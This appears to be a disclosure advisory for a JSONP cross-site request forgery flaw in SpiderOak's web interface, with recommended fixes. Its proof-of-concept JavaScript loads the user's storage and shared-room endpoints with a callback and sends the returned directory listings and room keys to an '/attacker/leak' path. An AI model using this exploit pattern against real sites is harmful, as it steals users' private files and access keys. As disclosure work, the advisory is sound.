*** Security Advisory ***

Title: CRSF attack on the SpiderOak web interface

-- Summary --

SpiderOak offers remote access to user data through a JavaScript web interface.
This interface is vulnerable to JSONP CSRF attacks, using which an arbitrary 
website can retrieve a logged-in SpiderOak user's entire directory structure and the room keys for all her shared rooms (and hence, the plaintext for 
all her shared folders and files).

-- Threat Model --

Any website can exploit this weakness provided that:
- the target is logged into the SpiderOak web interface while she visits the website, and
- the website knows or can guess the SpiderOak username of its target.


-- Vulnerability description --

The SpiderOak web interface uses AJAX to populate the directory structure in the user's TreeView. Specifically, asynchronous requests to "https://spideroak.com/storage/<base32(username)>/<device/path>" yield JSON-formatted data describing the contents of "device/path", but this URL also accepts a "callback" parameter to return a JSONP script, without checking the origin or referer of the request, relying solely on the user's login cookie for authentication. 

So, if a SpiderOak user visits a malicious webpage when she is logged into the SpiderOak web interfcace, the malicious website may execute a JSONP CSRF attack [1]
by include the following script:

<script src="https://spideroak.com/storage/<u32>/?callback=f">

where f is a javascript function written by the attacker that parses the returned JSON object, for instance:

f({
    "stats": {
        "firstname": "X",
        "lastname": "Y",
        "devices": 3,
        "backupsize": "100.15 MB",
        "billing_url": "https://spideroak.com/user/validate?hmac=...",
        "size": 2
    },
    "devices": [
        ["device1", "device1/"],
        ["device2", "device2/"],
        ["device3", "device3/"]
    ]
})

The function f can then send back the data to the attacker:

function f(result)
{
 var xhr = new XMLHttpRequest();
 xhr.open('GET', '/attacker/leak?result='+JSON.stringify(result));
 xhr.send();

 for(var i in result.devices)
 {
  var s = document.createElement('script');
  s.src = 'https://spideroak.com/storage/<u32>/'+result.devices[i][1]+'?callback=g';
 }
}

The contents of each device will in turn be applied to a similar function g:

g({
    "dirs": [
        ["dropbox", "d%3A/dropbox/"],
        ["pictures", "d%3A/pictures/"]
    ],
    "files": []
})

which can recursively list and leak the full directory listing of the target's account.

The same problem also exists on the list of shared rooms:

<script src="https://spideroak.com/storage/<u32>/shares?&callback=f">

will result in:

h({
    "share_rooms": [{
        "url": "/browse/share/prosecco/12345678",
        "room_key": "12345678",
        "room_description": "...description...",
        "room_name": "...name..."
    }],
    "share_id": "prosecco",
    "share_id_b32": "OBZG643FMNRW6"
})


In this case, the returned JSON object contains the list of share rooms the user has access to, including their access keys. This grants the attacker full access to the decrypted files in all shared rooms that the user has access to.

-- Suggested changes --

 - Every AJAX query used by SpiderOak's web interface should be protected against CSRF attacks by including a token in the URL or checking the referer or origin HTTP headers

 - We also noted that the SpiderOak web interface does not use client side key derivation for login (the login form sends the cleartext password and it is even possible to login by plain HTTP authentication), defeating the purpose of the server-blind derivation used when registering.

Refernces
---------
[1] JSONP: Cross-site request forgery 
    http://en.wikipedia.org/wiki/JSONP#Cross-site_request_forgery